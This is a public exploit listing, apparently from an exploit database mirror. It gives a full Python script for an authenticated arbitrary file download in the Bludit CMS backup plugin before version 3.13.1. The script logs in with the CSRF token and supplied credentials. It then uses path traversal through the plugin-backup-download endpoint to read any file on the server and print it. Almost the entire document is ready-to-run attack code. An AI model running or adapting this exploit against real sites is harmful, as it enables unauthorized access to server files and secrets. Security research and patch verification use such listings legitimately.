Exploit for Bludit Arbitrary File Download

## https://sploitus.com/exploit?id=PACKETSTORM:173120
# -*- coding: utf-8 -*-  
#/usr/bin/env python  
  
# Exploit Title: Bludit < 3.13.1 Backup Plugin - Arbitrary File Download (Authenticated)  
# Date: 2022-07-21  
# Exploit Author: Antonio Cuomo (arkantolo)  
# Vendor Homepage: https://www.bludit.com  
# Software Link: https://github.com/bludit/bludit  
# Version: < 3.13.1  
# Tested on: Debian 10 - PHP Version: 7.3.14  
  
import requests  
import argparse  
from bs4 import BeautifulSoup #pip3 install beautifulsoup4  
  
def main():  
parser = argparse.ArgumentParser(description='Bludit < 3.13.1 - Backup Plugin - Arbitrary File Download (Authenticated)')  
parser.add_argument('-x', '--url', type=str, required=True)  
parser.add_argument('-u', '--user', type=str, required=True)  
parser.add_argument('-p', '--password', type=str, required=True)  
parser.add_argument('-f', '--file', type=str, required=True)  
args = parser.parse_args()  
print("\nBludit < 3.13.1 - Backup Plugin - Arbitrary File Download (Authenticated)","\nExploit Author: Antonio Cuomo (Arkantolo)\n")  
exploit(args)  
  
def exploit(args):  
s2 = requests.Session()  
  
url = args.url.rstrip("/")  
  
#get csrf token  
r = s2.get(url+'/admin/')  
soup = BeautifulSoup(r.text, 'html.parser')  
formtoken = soup.find('input', {'name':'tokenCSRF'})['value']  
  
#login  
body= {'tokenCSRF':formtoken,'username':args.user,'password':args.password}  
r = s2.post(url+'/admin/', data=body, allow_redirects=False)  
if(r.status_code==301 and r.headers['location'].find('/admin/dashboard') != -1):  
print("[*] Login OK")  
else:  
print("[*] Login Failed")  
exit(1)  
  
#arbitrary download  
r = s2.get(url+'/plugin-backup-download?file=../../../../../../../../'+args.file)  
if(r.status_code==200 and len(r.content)>0):  
print("[*] File:")  
print(r.text)  
else:  
print("[*] Exploit Failed")  
exit(1)  
  
if __name__ == '__main__':  
main()